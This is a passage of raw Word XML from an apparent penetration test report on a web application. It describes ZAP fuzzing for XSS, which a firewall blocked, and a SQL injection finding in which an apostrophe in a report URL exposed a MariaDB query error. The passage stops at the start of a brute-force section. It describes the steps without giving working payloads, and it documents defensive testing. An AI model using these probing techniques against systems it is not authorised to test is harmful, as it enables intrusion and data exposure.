      <w:r w:rsidR="007F63CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF6492">
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidR="00786015">
        <w:t xml:space="preserve">is a technique of submitting numerous invalid or unexpected data to a target. Additionally, it </w:t>
      </w:r>
      <w:r w:rsidR="00AF6492">
        <w:t>can be used to detect vulnerabilities such as injection and Cross-Site Scripting</w:t>
      </w:r>
      <w:r w:rsidR="00F56280">
        <w:t xml:space="preserve"> (XSS)</w:t>
      </w:r>
      <w:r w:rsidR="00AF6492">
        <w:t xml:space="preserve"> attacks. It operates by </w:t>
      </w:r>
      <w:r w:rsidR="00FA063D">
        <w:t>using a list of payloads a</w:t>
      </w:r>
      <w:r w:rsidR="00673496">
        <w:t>nd inserting it as part of a request.</w:t>
      </w:r>
      <w:r w:rsidR="00F56280">
        <w:t xml:space="preserve"> As seen below, the user profile edit page would be tested for XSS vulnerability.</w:t>
      </w:r>
      <w:r w:rsidR="009E4305">
        <w:t xml:space="preserve"> Refer to </w:t>
      </w:r>
      <w:hyperlink w:anchor="_OWASP_ZAP" w:history="1">
        <w:r w:rsidR="009E4305" w:rsidRPr="0092671E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix B</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009E4305">
        <w:t xml:space="preserve"> on setting up ZAP with a session cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C22A9B" w14:textId="2F4EDC14" w:rsidR="009700A7" w:rsidRDefault="009700A7" w:rsidP="009700A7">
      <w:r w:rsidRPr="009700A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F5DBB36" wp14:editId="46211D23">
            <wp:extent cx="5943600" cy="2283650"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>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80"/>
                    <a:srcRect t="17040"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2283650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F3A759" w14:textId="77777777" w:rsidR="006D2F80" w:rsidRDefault="006D2F80" w:rsidP="009700A7"/>
    <w:p w14:paraId="55B6A46E" w14:textId="675FD74A" w:rsidR="00DB1B0D" w:rsidRDefault="00B07283" w:rsidP="00E77D9E">
      <w:r>
        <w:t xml:space="preserve">The POST request </w:t>
      </w:r>
      <w:r w:rsidR="0014181B">
        <w:t xml:space="preserve">would be shown </w:t>
      </w:r>
      <w:r w:rsidR="00727DC1">
        <w:t xml:space="preserve">in the tree site </w:t>
      </w:r>
      <w:r w:rsidR="00727FBD">
        <w:t>upon submitt</w:t>
      </w:r>
      <w:r w:rsidR="0014181B">
        <w:t xml:space="preserve">ing the form. Using this request, ZAP can modify the </w:t>
      </w:r>
      <w:r w:rsidR="00453A8F">
        <w:t>request and send multiple payloads.</w:t>
      </w:r>
      <w:r w:rsidR="00E608AA">
        <w:t xml:space="preserve"> As seen below, the Address input which had a placeholder of “test” </w:t>
      </w:r>
      <w:r w:rsidR="00A43981">
        <w:t xml:space="preserve">would be </w:t>
      </w:r>
      <w:r w:rsidR="00C90A12">
        <w:t>replaced by the payloads.</w:t>
      </w:r>
      <w:r w:rsidR="00767353">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="0092295F">
        <w:t xml:space="preserve">pre-defined XSS payloads would be used </w:t>
      </w:r>
      <w:r w:rsidR="004D6003">
        <w:t>for this testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF524D5" w14:textId="7B49B521" w:rsidR="00A27790" w:rsidRDefault="003A720C" w:rsidP="009700A7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658273" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33875669" wp14:editId="5FAD2230">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>260019</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1551446</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1213422" cy="107370"/>
                <wp:effectExtent l="0" t="0" r="25400" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="87" name="Rectangle 87"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1213422" cy="1073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35C9F8">
              <v:rect id="Rectangle 87" style="position:absolute;margin-left:20.45pt;margin-top:122.15pt;width:95.55pt;height:8.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C848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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B3AE6B9" wp14:editId="1A973DB5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1516777</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2162491</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="390029" cy="233123"/>
                <wp:effectExtent l="0" t="0" r="10160" b="14605"/>
                <wp:wrapNone/>
                <wp:docPr id="86" name="Rectangle 86"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="390029" cy="233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A3D56">
              <v:rect id="Rectangle 86" style="position:absolute;margin-left:119.45pt;margin-top:170.25pt;width:30.7pt;height:18.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32E1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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A27790">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58F01DE8" wp14:editId="742652B6">
            <wp:extent cx="5719606" cy="2552700"/>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b="20679"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5720715" cy="2553195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="012A3B32" w14:textId="77777777" w:rsidR="003E5487" w:rsidRDefault="003E5487" w:rsidP="009700A7"/>
    <w:p w14:paraId="0C39739C" w14:textId="77E2B173" w:rsidR="003E5487" w:rsidRDefault="00A9545A" w:rsidP="00E77D9E">
      <w:r>
        <w:t>Af</w:t>
      </w:r>
      <w:r w:rsidR="003E5487">
        <w:t xml:space="preserve">ter </w:t>
      </w:r>
      <w:r w:rsidR="009F20ED">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00AD0BE2">
        <w:t xml:space="preserve">test </w:t>
      </w:r>
      <w:r w:rsidR="009F20ED">
        <w:t xml:space="preserve">started, the </w:t>
      </w:r>
      <w:r w:rsidR="008C5A1A">
        <w:t xml:space="preserve">fuzzer was blocked </w:t>
      </w:r>
      <w:r w:rsidR="002E2C0D">
        <w:t>by the Web Application Firewall and the test could not proceed.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> However, based on analyzing the </w:t>
      </w:r>
      <w:r w:rsidR="000A7E12">
        <w:t xml:space="preserve">response from the payloads that </w:t>
      </w:r>
      <w:r w:rsidR="005962F6">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="000A7E12">
        <w:t xml:space="preserve"> sent, </w:t>
      </w:r>
      <w:r w:rsidR="009B3553">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="000A7E12">
        <w:t>malicious scripts were redirected to a 403 page</w:t>
      </w:r>
      <w:r w:rsidR="00E759C7">
        <w:t xml:space="preserve">. Hence, the client-input fields </w:t>
      </w:r>
      <w:r w:rsidR="005962F6">
        <w:t>have</w:t>
      </w:r>
      <w:r w:rsidR="00E759C7">
        <w:t xml:space="preserve"> some security measures in-placed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E9C9B9" w14:textId="79BA6116" w:rsidR="00653371" w:rsidRDefault="00A27790" w:rsidP="00C57D2E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="328D88E5" wp14:editId="237CF2CC">
            <wp:extent cx="5942944" cy="1603169"/>
            <wp:effectExtent l="0" t="0" r="127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2042"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="16033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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="292A3A47" w14:textId="77777777" w:rsidR="00E54A5D" w:rsidRDefault="00E54A5D">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc93487294"/>
      <w:bookmarkStart w:id="80" w:name="_Toc93502871"/>
      <w:bookmarkStart w:id="81" w:name="_Toc93526906"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="651A0675" w14:textId="1E75DC00" w:rsidR="00A16265" w:rsidRDefault="00B50C9D" w:rsidP="00B50C9D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc94100231"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Manual Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="1EEC2C66" w14:textId="121506DF" w:rsidR="00526507" w:rsidRDefault="000B468E" w:rsidP="00E77D9E">
      <w:r>
        <w:t xml:space="preserve">After automated scans are completed, </w:t>
      </w:r>
      <w:r w:rsidR="00BA0C83">
        <w:t xml:space="preserve">manual penetration testing should always be performed in addition to </w:t>
      </w:r>
      <w:r w:rsidR="00823044">
        <w:t>automated</w:t>
      </w:r>
      <w:r w:rsidR="00BA0C83">
        <w:t xml:space="preserve"> scanning to find all types of vulnerabilities.</w:t>
      </w:r>
      <w:r w:rsidR="00644E98">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF427A">
        <w:t xml:space="preserve">Moreover, </w:t>
      </w:r>
      <w:r w:rsidR="00B60B18">
        <w:t xml:space="preserve">some manual </w:t>
      </w:r>
      <w:r w:rsidR="00D9231B">
        <w:t xml:space="preserve">tests stated in this section revealed </w:t>
      </w:r>
      <w:r w:rsidR="00970722">
        <w:t xml:space="preserve">vulnerabilities that </w:t>
      </w:r>
      <w:r w:rsidR="00D9231B">
        <w:t>automated</w:t>
      </w:r>
      <w:r w:rsidR="006E74E6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008942BF">
        <w:t xml:space="preserve">scans </w:t>
      </w:r>
      <w:r w:rsidR="006E74E6">
        <w:t>did not detect.</w:t>
      </w:r>
      <w:r w:rsidR="00A008A9">
        <w:t xml:space="preserve"> The manual testing performed </w:t>
      </w:r>
      <w:r w:rsidR="00191DBE">
        <w:t>would be based on OWASP To</w:t>
      </w:r>
      <w:r w:rsidR="00F55E9F">
        <w:t>p 10 application security risks 2017</w:t>
      </w:r>
      <w:r w:rsidR="00243F67">
        <w:t xml:space="preserve"> and other possible known attack vectors</w:t>
      </w:r>
      <w:r w:rsidR="00F55E9F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA82A33" w14:textId="7D8EA8D2" w:rsidR="00271498" w:rsidRDefault="00271498">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc93487295"/>
      <w:bookmarkStart w:id="84" w:name="_Toc93502872"/>
      <w:bookmarkStart w:id="85" w:name="_Toc93526907"/>
    </w:p>
    <w:p w14:paraId="758D80DA" w14:textId="77777777" w:rsidR="00A90A85" w:rsidRDefault="00A90A85" w:rsidP="00A90A85">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc94100232"/>
      <w:r>
        <w:t>SQL Injection Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="50952F25" w14:textId="77777777" w:rsidR="00A90A85" w:rsidRPr="00775377" w:rsidRDefault="00A90A85" w:rsidP="00A90A85">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by: Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50995161" w14:textId="72B6A669" w:rsidR="007A0217" w:rsidRDefault="007A0217" w:rsidP="00A90A85">
      <w:r>
        <w:t xml:space="preserve">SQL injection is a web security flaw that allows an attacker to interfere with a web application’s database queries by </w:t>
      </w:r>
      <w:r w:rsidR="00FF716D">
        <w:t>injecting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL code through some method of client</w:t>
      </w:r>
      <w:r w:rsidR="00FF716D">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>supplied input. Most of the time, it allows an attacker to view data without author</w:t>
      </w:r>
      <w:r w:rsidR="00762A42">
        <w:t>ization</w:t>
      </w:r>
      <w:r>
        <w:t>. This could include data belonging to other users or any other information that the web application has access to. In many circumstances, an attacker can modify or delete this data, causing the application’s content to be permanently altered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DB7C5E" w14:textId="358B1A73" w:rsidR="00A90A85" w:rsidRDefault="00A90A85" w:rsidP="00A90A85">
      <w:r>
        <w:t xml:space="preserve">The employee privileges are limited with barely </w:t>
      </w:r>
      <w:r w:rsidR="005E1773">
        <w:t xml:space="preserve">any </w:t>
      </w:r>
      <w:r>
        <w:t>entry points for injection attacks. However, t</w:t>
      </w:r>
      <w:r w:rsidRPr="005A11B3">
        <w:t>he Employee Attendance Report page seems to be capable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidRPr="005A11B3">
        <w:t>searching, filtering, and displaying data from a database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133ED8A0" w14:textId="77777777" w:rsidR="00A90A85" w:rsidRDefault="00A90A85" w:rsidP="00A90A85">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="646A1847" wp14:editId="3B5FF7D9">
            <wp:extent cx="5943600" cy="2552131"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="47" name="Picture 4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3693"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2552131"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D09279F" w14:textId="3764ABAF" w:rsidR="00A90A85" w:rsidRDefault="00A90A85" w:rsidP="00A90A85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>When the Search button was activated, the results are filtered. Notice that the URL was appended</w:t>
      </w:r>
      <w:r w:rsidR="00FA6A55">
        <w:t xml:space="preserve"> with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “?</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16A0A">
        <w:t>startend=202</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16A0A">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>01</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16A0A">
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16A0A">
        <w:t>+-+202</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16A0A">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>01</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16A0A">
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16A0A">
        <w:t>”.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This confirms that the search field values were used </w:t>
      </w:r>
      <w:r w:rsidR="00E275B0">
        <w:t>to have</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> some sort of interaction with the database.</w:t>
      </w:r>
      <w:r w:rsidR="00B82A07" w:rsidRPr="00B82A07">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1341F321" w14:textId="2C1B3A95" w:rsidR="00A90A85" w:rsidRDefault="00B82A07" w:rsidP="00A90A85">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658274" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7761DFC4" wp14:editId="2D041C13">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2297220</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>219196</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="922814" cy="129026"/>
                <wp:effectExtent l="0" t="0" r="10795" b="23495"/>
                <wp:wrapNone/>
                <wp:docPr id="88" name="Rectangle 88"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="922814" cy="12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B7A159">
              <v:rect id="Rectangle 88" style="position:absolute;margin-left:180.9pt;margin-top:17.25pt;width:72.65pt;height:10.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7A24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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A90A85">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0317EFD4" wp14:editId="485848DE">
            <wp:extent cx="5864093" cy="1992702"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="192" name="Picture 19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 website&#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9600"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5890500" cy="2001676"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3A0DAF" w14:textId="77777777" w:rsidR="00F90D63" w:rsidRDefault="00F90D63" w:rsidP="00A90A85"/>
    <w:p w14:paraId="6418EFE9" w14:textId="054635FF" w:rsidR="00A90A85" w:rsidRDefault="00A90A85" w:rsidP="00A90A85">
      <w:r>
        <w:t xml:space="preserve">Upon further testing of the web application, adding an </w:t>
      </w:r>
      <w:r w:rsidRPr="005E28E2">
        <w:t>apostrophe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at the end of the URL caused an unhandled error which disclosed the query used to retrieve information from the database. The database error revealed the table name, columns, and database type being MariaDB. This verifies that the web application does not have proper validation and is vulnerable to SQL injection attacks.</w:t>
      </w:r>
      <w:r w:rsidR="009763CA" w:rsidRPr="009763CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB89CF4" w14:textId="1B3DFEFE" w:rsidR="00A90A85" w:rsidRDefault="008B5C1E" w:rsidP="00A90A85">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658276" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F83B418" wp14:editId="41FCB02B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1648639</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>725203</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="455501" cy="107370"/>
                <wp:effectExtent l="0" t="0" r="20955" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="90" name="Rectangle 90"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="455501" cy="1073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6D05D5">
              <v:rect id="Rectangle 90" style="position:absolute;margin-left:129.8pt;margin-top:57.1pt;width:35.85pt;height:8.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C871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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009763CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658275" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D86B362" wp14:editId="5BC1890C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>174928</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>834556</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3570135" cy="107370"/>
                <wp:effectExtent l="0" t="0" r="11430" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="89" name="Rectangle 89"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3570135" cy="1073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C2E52A">
              <v:rect id="Rectangle 89" style="position:absolute;margin-left:13.75pt;margin-top:65.7pt;width:281.1pt;height:8.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80AA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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A90A85">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DF056F8" wp14:editId="084575A3">
            <wp:extent cx="5943600" cy="1331407"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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0169"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1331407"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEDCF7E" w14:textId="77777777" w:rsidR="00F90D63" w:rsidRDefault="00F90D63">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9E33F2" w14:textId="77777777" w:rsidR="00F90D63" w:rsidRDefault="00F90D63" w:rsidP="00F90D63">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc94100233"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Authentication Brute-force Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="1C3B9FBC" w14:textId="77777777" w:rsidR="00F90D63" w:rsidRPr="00775377" w:rsidRDefault="00F90D63" w:rsidP="00F90D63">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
